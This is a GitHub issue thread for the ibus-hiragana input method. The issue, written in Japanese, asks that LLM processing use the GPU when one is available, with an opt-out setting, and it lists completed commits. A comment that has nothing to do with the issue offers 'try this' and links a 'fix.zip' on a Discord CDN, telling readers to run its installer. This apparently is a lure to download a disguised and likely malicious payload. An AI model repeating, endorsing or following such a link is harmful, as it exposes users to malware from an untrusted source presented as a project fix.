### ISSUE TITLE
LLMの処理でGPUを利用可能なら使用する

### ISSUE THREAD

**Issue by ShikiOkasaka** [esrille/ibus-hiragana#183]
オプションで使用しないようにもできるようにしておくこと。

- [X] code 6b228a5248ca793b9d25cd5f816a6e61cdacf515
- [X] setup 7c8be9476e295b9a1c24ee30afd0004ceecc54a6
- [X] doc e2a418c11798bebb67a6311b279d045cd8ea7743

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
